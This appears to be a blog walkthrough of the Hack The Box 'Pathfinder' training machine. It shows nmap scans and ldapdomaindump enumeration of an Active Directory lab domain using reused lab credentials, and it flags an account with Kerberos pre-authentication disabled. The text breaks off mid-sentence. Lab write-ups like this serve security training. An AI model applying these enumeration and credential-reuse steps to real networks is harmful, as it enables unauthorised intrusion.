<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Pathfinder Walkthrough | HTB</title>

    <meta name="description" content="After the Shield Walkthrough, Here I&#x27;m with Pathfinder box and this is the last box you can play ....">
    <link rel="icon" href="../../content/images/2021/06/favicon.ico" type="image/x-icon">
    <link rel="canonical" href="../index.html">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="h4rithd.com">
    <meta property="og:type" content="article">
    <meta property="og:title" content="Pathfinder Walkthrough | HTB">
    <meta property="og:description" content="After the Shield Walkthrough, Here I&#x27;m with Pathfinder box and this is the last box you can play ....">
    <meta property="og:url" content="https://h4rithd.com/blog/starting-point-htb-pathfinder-walkthrough/">
    <meta property="og:image" content="https://h4rithd.com/blog/content/images/2021/06/PathfinderBG-1.jpg">
    <meta property="article:published_time" content="2021-05-07T16:48:00.000Z">
    <meta property="article:modified_time" content="2023-11-15T14:04:17.000Z">
    <meta property="article:tag" content="Starting Point Walkthrough">
    <meta property="article:tag" content="Pathfinder Walkthrough">
    <meta property="article:tag" content="h4rithd">
    <meta property="article:tag" content="Harith Dilshan">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Pathfinder Walkthrough | HTB">
    <meta name="twitter:description" content="After the Shield Walkthrough, Here I&#x27;m with Pathfinder box and this is the last box you can play ....">
    <meta name="twitter:url" content="https://h4rithd.com/blog/starting-point-htb-pathfinder-walkthrough/">
    <meta name="twitter:image" content="https://h4rithd.com/blog/content/images/2021/06/PathfinderBG-1.jpg">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="Harith Dilshan">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="Starting Point Walkthrough, Pathfinder Walkthrough, h4rithd, Harith Dilshan">
    <meta name="twitter:site" content="@h4rithd">
    <meta name="twitter:creator" content="@h4rithd">
    <meta property="og:image:width" content="1920">
    <meta property="og:image:height" content="1035">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "https://h4rithd.com/blog/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/Logo.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2023/11/5-1.jpeg",
            "width": 2000,
            "height": 2000
        },
        "url": "https://h4rithd.com/blog/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "Pathfinder Walkthrough | HTB",
    "url": "https://h4rithd.com/blog/starting-point-htb-pathfinder-walkthrough/",
    "datePublished": "2021-05-07T16:48:00.000Z",
    "dateModified": "2023-11-15T14:04:17.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://h4rithd.com/blog/content/images/2021/06/PathfinderBG-1.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "Starting Point Walkthrough, Pathfinder Walkthrough, h4rithd, Harith Dilshan",
    "description": "After the Shield Walkthrough, Here I&#x27;m with Pathfinder box and this is the last box you can play if you are a free member on HTB platform. Let&#x27;s hack and grab the flags.\n\nAs I mentioned before, the starting point machines are a series of 9 machines rated as &quot;very easy&quot; and should be rooted in a sequence. So it means, if you need to go through this box, first of all you must have a complete Shield machine.\n\nEnough talks, 🥱 Let’s Get It Started 🐱‍💻\n\nDisclaimers: No flags (user/root) are shown i",
    "mainEntityOfPage": "https://h4rithd.com/blog/starting-point-htb-pathfinder-walkthrough/"
}
    </script>

    <meta name="generator" content="Ghost 5.72">
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html">

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }
    
    amp-youtube {
        height: calc(100vw / 1.78);
        width: 100vw;
        position: relative;
    }

    amp-youtube img {
        position: absolute;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content blockquote.kg-blockquote-alt {
        font-size: 1.2em;
        font-style: italic;
        line-height: 1.6em;
        text-align: center;
        color: #738a94;
        padding: 0.75em 3em 1.25em;
    }

    .post-content blockquote.kg-blockquote-alt::before {
        display: none;
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 3px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-toggle-card-icon {
        display: none;
    }

    .kg-toggle-content {
        margin-top: 0.8rem;
    }

    .kg-product-card-container {
        background: transparent;
        padding: 20px;
        width: 100%;
        border-radius: 5px;
        box-shadow: inset 0 0 0 1px rgb(124 139 154 / 25%);
    }

    .kg-product-card-description p {
        margin-top: 1.5em;
    }

    .kg-product-card-description ul {
        margin-left: 24px;
    }

    .kg-product-card-title {
        font-size: 1.9rem;
        font-weight: 700;
    }

    .kg-product-card-rating-star {
        height: 28px;
        width: 20px;
        margin-right: 2px;
    }

    .kg-product-card-rating-star svg {
    width: 16px;
    height: 16px;
    fill: currentColor;
    opacity: 0.15;
    }

    .kg-product-card-rating-active.kg-product-card-rating-star svg {
    opacity: 1;
    }

    .kg-nft-card-container {
        position: relative;
        display: flex;
        flex: auto;
        flex-direction: column;
        text-decoration: none;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.4rem;
        font-weight: 400;
        box-shadow: 0 2px 6px -2px rgb(0 0 0 / 10%), 0 0 1px rgb(0 0 0 / 40%);
        width: 100%;
        max-width: 512px;
        color: #15212A;
        background: #fff;
        border-radius: 5px;
        transition: none;
        margin: 0 auto;
    }

    .kg-nft-metadata {
        padding: 2.0rem;
    }

    .kg-nft-image-container {
        position: relative;
    }

    .kg-nft-image {
        display: flex;
        border-radius: 5px 5px 0 0;
    }

    .kg-nft-header {
        display: flex;
        justify-content: space-between;
        align-items: flex-start;
        gap: 20px;
    }

    .kg-nft-header h4.kg-nft-title {
        font-size: 1.9rem;
        font-weight: 700;
        margin: 0;
        color: #15212A;
    }

    .kg-nft-header amp-img {
        max-width: 114px;
        max-height: 26px;
    }

    .kg-nft-opensea-logo {
        margin-top: 2px;
        width: 100px;
    }

    .kg-nft-creator {
        font-family: inherit;
        color: #95A1AD;
    }

    .kg-nft-creator span {
        font-weight: 500;
        color: #15212A;
    }

    .kg-nft-card p.kg-nft-description {
        font-size: 1.4rem;
        line-height: 1.4em;
        margin: 2.0rem 0 0;
        color: #222;
    }

    .kg-button-card {
        display: flex;
        position: static;
        align-items: center;
        width: 100%;
        justify-content: center;
    }

    .kg-btn {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 2.0rem;
        height: 4.0rem;
        line-height: 4.0rem;
        font-size: 1.65rem;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
    }

    .kg-btn:hover {
        opacity: 0.85;
    }

    .kg-btn-accent {
        background-color: var(--ghost-accent-color, #1292EE);
        color: #fff;
    }

    .kg-callout-card {
        display: flex;
        padding: 20px 28px;
        border-radius: 3px;
    }

    .kg-callout-card-grey {
        background: rgba(124, 139, 154, 0.13);
    }

    .kg-callout-card-white {
        background: transparent;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-callout-card-blue {
        background: rgba(33, 172, 232, 0.12);
    }

    .kg-callout-card-green {
        background: rgba(52, 183, 67, 0.12);
    }

    .kg-callout-card-yellow {
        background: rgba(240, 165, 15, 0.13);
    }

    .kg-callout-card-red {
        background: rgba(209, 46, 46, 0.11);
    }

    .kg-callout-card-pink {
        background: rgba(225, 71, 174, 0.11);
    }

    .kg-callout-card-purple {
        background: rgba(135, 85, 236, 0.12);
    }

    .kg-callout-card-accent {
        background: var(--ghost-accent-color);
        color: #fff;
    }

    .kg-callout-card-accent a {
        color: #fff;
    }

    .kg-callout-emoji {
        padding-right: 16px;
        line-height: 1.3;
        font-size: 1.25em;
    }

    .kg-header-card {
        padding: 6em 3em;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
    }

    .kg-header-card.kg-size-small {
        padding-top: 4em;
        padding-bottom: 4em;
    }

    .kg-header-card.kg-size-large {
        padding-top: 12em;
        padding-bottom: 12em;
    }

    .kg-header-card.kg-width-full {
        padding-left: 4em;
        padding-right: 4em;
    }

    .kg-header-card.kg-align-left {
        text-align: left;
        align-items: flex-start;
    }

    .kg-header-card.kg-style-dark {
        background: #15171a;
        color: #ffffff;
    }

    .kg-header-card.kg-style-light {
        color: #15171a;
        border: 1px solid rgba(124, 139, 154, 0.25);
        border-width: 1px 0;
    }

    .kg-header-card.kg-style-accent {
        background-color: var(--ghost-accent-color);
    }

    .kg-header-card.kg-style-image {
        background-color: #e7e7eb;
        background-size: cover;
        background-position: center center;
    }

    .kg-header-card h2 {
        font-size: 4em;
        font-weight: 700;
        line-height: 1.1em;
        margin: 0;
    }

    .kg-header-card h2 strong {
        font-weight: 800;
    }

    .kg-header-card.kg-size-small h2 {
        font-size: 3em;
    }

    .kg-header-card.kg-size-large h2 {
        font-size: 5em;
    }

    .kg-header-card h3 {
        font-size: 1.25em;
        font-weight: 500;
        line-height: 1.3em;
        margin: 0;
    }

    .kg-header-card h3 strong {
        font-weight: 600;
    }

    .kg-header-card.kg-size-small h3 {
        font-size: 1em;
    }

    .kg-header-card.kg-size-large h3 {
        font-size: 1.5em;
    }

    .kg-header-card:not(.kg-style-light) h2,
    .kg-header-card:not(.kg-style-light) h3 {
        color: #ffffff;
    }

    .kg-header-card a.kg-header-card-button {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 1.2em;
        height: 2.4em;
        line-height: 1em;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-size: 0.95em;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
        background-color: var(--ghost-accent-color);
        color: #ffffff;
        margin: 1.75em 0 0;
    }

    .kg-header-card a.kg-header-card-button:hover {
        opacity: 0.85;
    }

    .kg-header-card.kg-size-large a.kg-header-card-button {
        margin-top: 2em;
    }

    .kg-header-card.kg-size-small a.kg-header-card-button {
        margin-top: 1.5em;
    }

    .kg-header-card.kg-style-image a.kg-header-card-button,
    .kg-header-card.kg-style-dark a.kg-header-card-button {
        background: #ffffff;
        color: #15171a;
    }

    .kg-header-card.kg-style-accent a.kg-header-card-button {
        background: #ffffff;
        color: var(--ghost-accent-color);
    }

    .kg-audio-card {
        display: flex;
        width: 100%;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-audio-thumbnail {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 80px;
        min-width: 80px;
        height: 80px;
        background: transparent;
        object-fit: cover;
        aspect-ratio: 1/1;
        border-radius: 3px 0 0 3px;
    }

    .kg-audio-thumbnail.placeholder {
        background: var(--ghost-accent-color);
    }

    .kg-audio-thumbnail.placeholder svg {
        width: 24px;
        height: 24px;
        fill: white;
    }

    .kg-audio-player-container {
        position: relative;
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        width: 100%;
        --seek-before-width: 0%;
        --volume-before-width: 100%;
        --buffered-width: 0%;
    }

    .kg-audio-title {
        width: 100%;
        padding: 8px 12px 0;
        border: none;
        font-family: inherit;
        font-size: 1.1em;
        font-weight: 700;
        background: transparent;
    }

    .kg-audio-player {
        display: none;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #0065a3;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Pathfinder Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-05-07">07 May 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://h4rithd.com/blog/content/images/2021/06/PathfinderBG-1.jpg" width="600" height="340" layout="responsive" 
                alt="Pathfinder Walkthrough"
                ></amp-img>
            </figure>
            <section class="post-content">

                <p>After the Shield Walkthrough, Here I'm with Pathfinder box and this is the last box you can play if you are a free member on HTB platform. Let's hack and grab the flags.</p><hr></hr><p>As I mentioned before, the starting point machines are a series of 9 machines rated as "<strong>very easy</strong>" and should be <strong>rooted in a sequence</strong>. So it means, if you need to go through this box, first of all you must have a complete <a href="https://h4rithd.com/blog/starting-point-htb-shield-walkthrough/index.html?ref=192.168.184.131">Shield </a>machine.</p><p>Enough talks, 🥱 Let’s Get It Started 🐱‍💻</p><blockquote><strong><em>Disclaimers: </em><em>No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤</em></strong></blockquote>


<div class="elfsight-app-a4de7430-6c0c-44b8-aada-9b9ac759e396"></div>

<hr></hr><h2 id="00-start-machine-%E2%80%A6"><strong>00. Start Machine …</strong></h2><p>To start the machine, Just click on "<strong>Join Machine</strong>".</p><figure class="kg-card kg-image-card"></figure><p>Then you can see the <strong>IP </strong>address for that machine. <strong>🤠</strong></p><figure class="kg-card kg-image-card"></figure><p>Before going to enumeration steps we can simply ping to the IP address and check whether  the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! 🙂</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-66.png" class="kg-image" width="1522" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-66.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-66.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-66.png 1522w" layout="responsive"></amp-img></figure><p>As a ping result, it's <code>TTL=127</code>. There is only one route between machine and us (VPN). So definitely it will be a <code>Windows</code> machine.</p><hr></hr><h2 id="01-enumeration-first-%E2%80%A6"><strong>01. Enumeration First …</strong></h2><h3 id="011-fast-ports-scan"><strong>01.1 Fast ports scan</strong></h3><p>As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.</p><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30</code></pre><pre><code class="language-bash">-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-67.png" class="kg-image" width="1864" height="2026" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-67.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-67.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-67.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-67.png 1864w" layout="responsive"></amp-img></figure><p>This is why I recommend to scan all the ports. Here you can see there are so many ports open and by looking at the open ports (<code>ldap,kpasswd5 &amp; kerberos</code>) we can definitely say that this machine is an<strong> Active Directory </strong>machine. We haven't touched that area before. Sharp your Active Directory enumeration skills, it will worth if you are willing to try Red Team activities.</p><blockquote><em>Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. [ <a href="https://en.wikipedia.org/wiki/Active_Directory?ref=192.168.184.131" rel="noopener noreferrer"><em>Wikipedia</em></a>]</em></blockquote><h3 id="012-run-nmap-scripting-engine"><strong>01.2 Run Nmap Scripting Engine</strong></h3><p>To get the best result, we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-68.png" class="kg-image" width="2560" height="1988" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-68.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-68.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-68.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2021/06/image-68.png 2400w" layout="responsive"></amp-img></figure><p>As it is an Active Directory machine, our enumeration steps will be different. <strong>ldap Enumeration</strong> is pretty cool if you use <a href="https://github.com/BloodHoundAD/BloodHound?ref=192.168.184.131" rel="noopener noreferrer">BloodHound</a>  because it gives us graphical information. But it's already done in official writeup. So let's begin with my way. 😎😎</p><h3 id="013-discover-more-on-domain"><strong>01.3 Discover more on domain</strong></h3><p>Nmap tells us the domain (<code>Domain: MEGACORP</code>) we are in. And don't forget we had some credentials from <a href="https://h4rithd.com/blog/starting-point-htb-shield-walkthrough/index.html?ref=192.168.184.131">Shield </a>machine. <code>sandra:Password1234!</code> First we can tryout with <a href="https://github.com/dirkjanm/ldapdomaindump?ref=192.168.184.131" rel="noopener noreferrer"><code>ldapdomaindump</code></a> tool. Let's start.</p><pre><code class="language-bash">ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep  </code></pre><pre><code class="language-bash">-u    : DOMAIN\username for authentication, leave empty for anonymous authentication
-p    : Password or LM:NTLM hash, will prompt if not specified
-o    : Directory in which the dump will be saved (default: current)
--no-json    : Disable JSON output
--no-grep    : Disable Greppable output </code></pre><p>Here is the output, 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-69.png" class="kg-image" width="1786" height="478" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-69.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-69.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-69.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-69.png 1786w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-70.png" class="kg-image" width="1932" height="370" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-70.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-70.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-70.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-70.png 1932w" layout="responsive"></amp-img></figure><p>As you can see there are a lot of <code>HTML</code> files here. Among them, first I choose <code>domain_users.html</code> You can view through it from the browser. But instead of that, I will use <a href="https://pypi.org/project/html2text/?ref=192.168.184.131" rel="noopener noreferrer"><code>html2text</code> </a>tool. You can simply install it by typing <code>sudo apt-get install html2text</code> . However the result will be like this. 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-71.png" class="kg-image" width="1166" height="514" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-71.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-71.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-71.png 1166w" layout="responsive"></amp-img></figure><p>There are 5 accounts here. <code>Guest, Administrator</code> and <code>krbtgt</code>accounts are the default accounts. <code>sandra</code>and <code>svc_bes</code>accounts are user created ones. As you can see, I highlighted the <code>svc_bes</code>account because it has enabled the<strong><code>DONT_REQ_PREAUTH</code></strong> flag.</p><p>Now I'll 